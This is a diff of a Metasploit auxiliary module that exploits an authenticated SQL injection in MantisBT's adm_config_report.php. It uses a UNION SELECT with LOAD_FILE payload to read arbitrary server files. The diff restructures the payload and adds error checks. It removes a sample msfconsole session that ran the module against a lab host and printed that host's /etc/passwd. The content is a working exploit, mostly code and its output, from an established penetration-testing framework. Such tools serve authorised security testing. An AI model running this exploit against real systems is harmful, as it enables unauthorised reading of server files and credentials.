|
1 | 1 | ## |
2 | | -# This file is part of the Metasploit Framework and may be subject to |
3 | | -# redistribution and commercial restrictions. Please see the Metasploit |
4 | | -# Framework web site for more information on licensing and terms of use. |
5 | | -# http://metasploit.com/framework/ |
6 | | -## |
| 2 | +## This module requires Metasploit: http//metasploit.com/download |
| 3 | +## Current source: https://github.com/rapid7/metasploit-framework |
| 4 | +### |
7 | 5 |
|
8 | 6 | require 'msf/core' |
9 | 7 |
|
10 | | -class Metasploit3 < Msf::Auxiliary |
| 8 | +class Metasploit4 < Msf::Auxiliary |
11 | 9 | Rank = GoodRanking |
12 | 10 |
|
13 | 11 | include Msf::Exploit::Remote::HttpClient |
@@ -60,121 +58,47 @@ def run |
60 | 58 | 'vars_post' => post |
61 | 59 | }) |
62 | 60 |
|
| 61 | + if !resp or !resp.body |
| 62 | + fail_with("Error in server response. Ensure the server IP is correct.") |
| 63 | + end |
| 64 | + |
63 | 65 | cookie = resp.get_cookies |
64 | 66 |
|
| 67 | + if cookie == '' |
| 68 | + fail_with("Authentication failed") |
| 69 | + end |
| 70 | + |
65 | 71 | filepath = datastore['FILEPATH'].unpack("H*")[0] |
66 | 72 |
|
| 73 | + payload = "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-7856%27" |
| 74 | + payload << "+UNION+ALL+SELECT+11%2C11%2C11%2C11%2CCONCAT%280x71676a7571%2CIFNULL%28CAST%28HEX%28LOAD_FILE" |
| 75 | + payload << "%280x#{filepath}%29%29+AS+CHAR%29%2C0x20%29%2C0x7169727071%29%2C11%23&apply_filter_button=Apply+Filter" |
| 76 | + |
67 | 77 | resp = send_request_cgi({ |
68 | 78 | 'uri' => normalize_uri(target_uri.path, '/adm_config_report.php'), |
69 | 79 | 'method' => 'POST', |
70 | | - 'data' => "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-7856%27+UNION+ALL+SELECT+11%2C11%2C11%2C11%2CCONCAT%280x71676a7571%2CIFNULL%28CAST%28HEX%28LOAD_FILE%280x#{filepath}%29%29+AS+CHAR%29%2C0x20%29%2C0x7169727071%29%2C11%23&apply_filter_button=Apply+Filter", |
| 80 | + 'data' => payload, |
71 | 81 | 'cookie' => cookie, |
72 | 82 | }) |
73 | 83 |
|
74 | | - resp.body =~ /qgjuq(.*)qirpq/ |
| 84 | + if !resp or !resp.body |
| 85 | + fail_with("Error in server response") |
| 86 | + end |
75 | 87 |
|
76 | | - file = [$1].pack("H*") |
| 88 | + #qgjuq is prepended to the result of the sql injection |
| 89 | + #qirpq is appended to the result of the sql injection |
| 90 | + #This allows the use of a simple regex to grab the contents |
| 91 | + #of the file easily from the page source. |
| 92 | + file = /qgjuq(.*)qirpq/.match(resp.body) |
| 93 | + |
| 94 | + file = file[0].gsub('qgjuq', '').gsub('qirpq', '') |
| 95 | + file = [file].pack("H*") |
77 | 96 |
|
78 | 97 | path = store_loot("mantisbt.file", "text/plain", datastore['RHOST'], file, datastore['FILEPATH']) |
79 | | - print_good("File saved to: #{path}") |
| 98 | + |
| 99 | + if path and path != '' |
| 100 | + print_good("File saved to: #{path}") |
| 101 | + end |
80 | 102 | end |
81 | 103 | end |
82 | 104 |
|
83 | | -__END__ |
84 | | -bperry@ubuntu:~/tools/metasploit-framework$ ./msfconsole |
85 | | -Call trans opt: received. 2-19-98 13:24:18 REC:Loc |
86 | | - |
87 | | - Trace program: running |
88 | | - |
89 | | - wake up, Neo... |
90 | | - the matrix has you |
91 | | - follow the white rabbit. |
92 | | - |
93 | | - knock, knock, Neo. |
94 | | - |
95 | | - (`. ,-, |
96 | | - ` `. ,;' / |
97 | | - `. ,'/ .' |
98 | | - `. X /.' |
99 | | - .-;--''--.._` ` ( |
100 | | - .' / ` |
101 | | - , ` ' Q ' |
102 | | - , , `._ \ |
103 | | - ,.| ' `-.;_' |
104 | | - : . ` ; ` ` --,.._; |
105 | | - ' ` , ) .' |
106 | | - `._ , ' /_ |
107 | | - ; ,''-,;' ``- |
108 | | - ``-..__``--` |
109 | | - |
110 | | - http://metasploit.pro |
111 | | - |
112 | | - |
113 | | - =[ metasploit v4.8.0-dev [core:4.8 api:1.0] |
114 | | -+ -- --=[ 1178 exploits - 649 auxiliary - 186 post |
115 | | -+ -- --=[ 312 payloads - 30 encoders - 8 nops |
116 | | - |
117 | | -msf > use auxiliary/gather/mantisbt_admin_sqli |
118 | | -msf auxiliary(mantisbt_admin_sqli) > set RHOST 172.31.16.109 |
119 | | -RHOST => 172.31.16.109 |
120 | | -msf auxiliary(mantisbt_admin_sqli) > set TARGETURI /mantisbt-1.2.16/ |
121 | | -TARGETURI => /mantisbt-1.2.16/ |
122 | | -msf auxiliary(mantisbt_admin_sqli) > set PASSWORD password |
123 | | -PASSWORD => password |
124 | | -msf auxiliary(mantisbt_admin_sqli) > show options |
125 | | - |
126 | | -Module options (auxiliary/gather/mantisbt_admin_sqli): |
127 | | - |
128 | | - Name Current Setting Required Description |
129 | | - ---- --------------- -------- ----------- |
130 | | - FILE /etc/passwd yes Path to remote file |
131 | | - PASSWORD password yes Single password |
132 | | - Proxies no Use a proxy chain |
133 | | - RHOST 172.31.16.109 yes The target address |
134 | | - RPORT 80 yes The target port |
135 | | - TARGETURI /mantisbt-1.2.16/ yes Relative URI of MantisBT installation |
136 | | - USERNAME administrator yes Single username |
137 | | - VHOST no HTTP server virtual host |
138 | | - |
139 | | -msf auxiliary(mantisbt_admin_sqli) > run |
140 | | - |
141 | | -[+] root:x:0:0:root:/root:/bin/bash |
142 | | -daemon:x:1:1:daemon:/usr/sbin:/bin/sh |
143 | | -bin:x:2:2:bin:/bin:/bin/sh |
144 | | -sys:x:3:3:sys:/dev:/bin/sh |
145 | | -sync:x:4:65534:sync:/bin:/bin/sync |
146 | | -games:x:5:60:games:/usr/games:/bin/sh |
147 | | -man:x:6:12:man:/var/cache/man:/bin/sh |
148 | | -lp:x:7:7:lp:/var/spool/lpd:/bin/sh |
149 | | -mail:x:8:8:mail:/var/mail:/bin/sh |
150 | | -news:x:9:9:news:/var/spool/news:/bin/sh |
151 | | -uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh |
152 | | -proxy:x:13:13:proxy:/bin:/bin/sh |
153 | | -www-data:x:33:33:www-data:/var/www:/bin/sh |
154 | | -backup:x:34:34:backup:/var/backups:/bin/sh |
155 | | -list:x:38:38:Mailing List Manager:/var/list:/bin/sh |
156 | | -irc:x:39:39:ircd:/var/run/ircd:/bin/sh |
157 | | -gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh |
158 | | -nobody:x:65534:65534:nobody:/nonexistent:/bin/sh |
159 | | -libuuid:x:100:101::/var/lib/libuuid:/bin/sh |
160 | | -syslog:x:101:103::/home/syslog:/bin/false |
161 | | -messagebus:x:102:104::/var/run/dbus:/bin/false |
162 | | -bperry:x:1000:1000:Brandon Perry,,,:/home/bperry:/bin/bash |
163 | | -avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false |
164 | | -usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false |
165 | | -dnsmasq:x:105:65534:dnsmasq,,,:/var/lib/misc:/bin/false |
166 | | -whoopsie:x:106:114::/nonexistent:/bin/false |
167 | | -avahi:x:107:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false |
168 | | -colord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/false |
169 | | -kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false |
170 | | -pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false |
171 | | -rtkit:x:111:121:RealtimeKit,,,:/proc:/bin/false |
172 | | -saned:x:112:122::/home/saned:/bin/false |
173 | | -speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh |
174 | | -lightdm:x:114:123:Light Display Manager:/var/lib/lightdm:/bin/false |
175 | | -hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false |
176 | | -mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false |
177 | | - |
178 | | -[*] Auxiliary module execution completed |
179 | | -msf auxiliary(mantisbt_admin_sqli) > |
180 | | - |
0 commit comments